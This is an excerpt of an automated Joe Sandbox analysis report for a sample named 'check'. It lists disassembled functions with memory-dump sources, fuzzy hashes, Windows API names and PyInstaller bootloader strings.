                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931C132B08F4241E764AF25688013EAAD4AF85BE0F944278EE9D53BD5EF7CD405C718
                                                                                                                                                                                                                                          Function 00007FF712519570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                          • Instruction ID: 7be03e24e1c39dcaaeeb4e3ef9d0a1324e3d30ddcef699101e7bf7efa19a878b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F0C8717286918BDB989F68A44262977D0F7483D0F90D079D58C83B14CA7CC051CF14
                                                                                                                                                                                                                                          Function 00007FF7124FD30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                          • Instruction ID: e9c00fe2d22ec22345863ad67d7e79c68096085571f7a064b93ca4218f89cdca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA00221E0CC0AD0E748AF04E8D0035A330FB98321BC00071E96D510B0AFFCE81CE320
                                                                                                                                                                                                                                          Function 00007FF7124F76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                          • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                          • Instruction ID: e71a17032375b422bd70b092f4d1c1515e37dc914e56d046513f083d25374bc6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1027124A0EF1791FA19FF69A8905B4A2A1BF48775FC450B5D82E42260FFFCA55DC230
                                                                                                                                                                                                                                          Function 00007FF7124F81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7124F86B7,?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F822C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                          • Instruction ID: 3b7cf58a228c2d1e19451b4c90cf64fda4fda628d840dcc40df668fd5df1d9f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08517311B2DE4281FB50FB29D8916BAE251AFD47A0FC44431DE0E4A6D5EEECE91CC760
                                                                                                                                                                                                                                          Function 00007FF7124F2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: fac39cf6d3b0a346d1e0cf02b35199e6441f402d3e6771e2ac713e2d202d3416
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551F726604BA186D6349F26F4581BAF7A1F798B61F004121EFDE43694EF7CD049DB20
                                                                                                                                                                                                                                          Function 00007FF7124F80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                          • Instruction ID: ee9e2e3134d07c45eb671aaa4dd482b8340c80649362865455252b2ab73f1e9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89218625B08E4281F741AF7EE984179A251FF88BB0F984271DE1D473D4EEACD999C221
                                                                                                                                                                                                                                          Function 00007FF712506290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: 282c0ff62a5810376df9958f8ef6ffd4fa333f31b7273d6699185676af359b2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26128561E0CA438AFB247E14D994279F691FB40770FE44175E68947AC4EBBCE588CB38
                                                                                                                                                                                                                                          Function 00007FF712500FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction ID: dc96d93ca5e7787cfdaabe922626503d00ee7b5e4c2745d82cf0f927fcfdaf83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8012A861E1C94385FB247E14E8946B9F691FB40764FC4C075D68A479C4EFBCE888CB2A
                                                                                                                                                                                                                                          Function 00007FF7124F1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 325688db707b716e890e7721bac51718733cf66b69f8e658bc345ec207d9d2ae
                                                                                                                                                                                                                                          • Instruction ID: cbed017ed5a5774d24223ee359774c633fb8572edf599d5ec99427359915cd37
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 325688db707b716e890e7721bac51718733cf66b69f8e658bc345ec207d9d2ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2041A321B08E5282EB11FB15A9406B9E390FF89BE0FC44572ED0C07795EEBCE919C720
                                                                                                                                                                                                                                          Function 00007FF7124F1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 71f39b651705446dc6c75fd4f4823db5e6c282555dd0675f73ea861cfb7b67ff
                                                                                                                                                                                                                                          • Instruction ID: 12498d1b4611b6e0778587e2eb5e10dd099d62bb3fdbc7242728264058f333fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f39b651705446dc6c75fd4f4823db5e6c282555dd0675f73ea861cfb7b67ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF415121B08E4296EB10FF2598405B9E390EF857A4FC44532ED4D17B95EEBCE91AC724
                                                                                                                                                                                                                                          Function 00007FF7124FEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                          • Instruction ID: 22a129cf519732ddf5a8ed39094e2b8ee0690ab671d8c3efe59e8b3e2d194d95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DD19432A08B4186EB30EF29D4403ADB7A0FB84BA9F500135DE8D57B95DF78E869C710
                                                                                                                                                                                                                                          Function 00007FF7124F2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                          • Instruction ID: aa1720b3ce7108d4d046d7992199bab046b5a6a8dd2a8a6ffa8cf6fcd9b7e75b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E531C732708E4142E720BB25A8546AAA691BFC8BA8F810136EF4D53759EE7CD91AC310
                                                                                                                                                                                                                                          Function 00007FF7124FDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD4D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD5B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD85
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDF3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
